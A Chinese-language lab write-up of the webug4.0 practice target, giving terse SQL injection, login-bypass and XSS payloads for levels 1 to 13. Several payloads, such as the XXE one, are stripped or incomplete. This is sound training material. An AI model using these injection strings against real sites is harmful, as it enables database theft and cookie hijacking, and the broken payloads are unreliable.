webug4.0 第一关到第三十关笔记

Webug官网:http://www.webug.org

一个不错的靶机,可以直接下载server2003虚拟机,即可直接打靶:

第一关:显错注入

用’会报错:

url:id=3' UNION SELECT 1,flag FROM flag where flag.id=1 %23

第二关:布尔注入

单引号:url?id=1' and length(user())>15 --+

第三关:延时注入

单引号:url?id=1' and sleep(1) --+, 页面有明显的延迟

第四关:Post注入

搜索引号’ 出现报错页面

搜索:' or sleep(3)  #  延时打开成功!

第五关:过滤注入(同上)

第六关:宽字节注入

宽字节注入原理即是利用编码转换,将服务器端强制添加的本来用于转义的\符号吃掉,从而能使攻击者输入的引号起到闭合作用,以至于可以进行SQL注入。

url?id=1%df',出现错误了

第七关:xxe注入

Payload为:data=

]>

发现不行,将payload进行url编码:

成功!

第八关:csv注入

没看懂!!!

第九关:反射型xss

第十关:存储型xss

提交内容为:alert(document.cookie)

第十一关:万能密码登录

尝试‘or 1=1 #,成功!

第十二关:DOM型XSS

在搜索框输入:" required="">alert(document.cookie)


第十三关:过滤XSS

你可能感兴趣的:(webug4.0 第一关到第三十关笔记)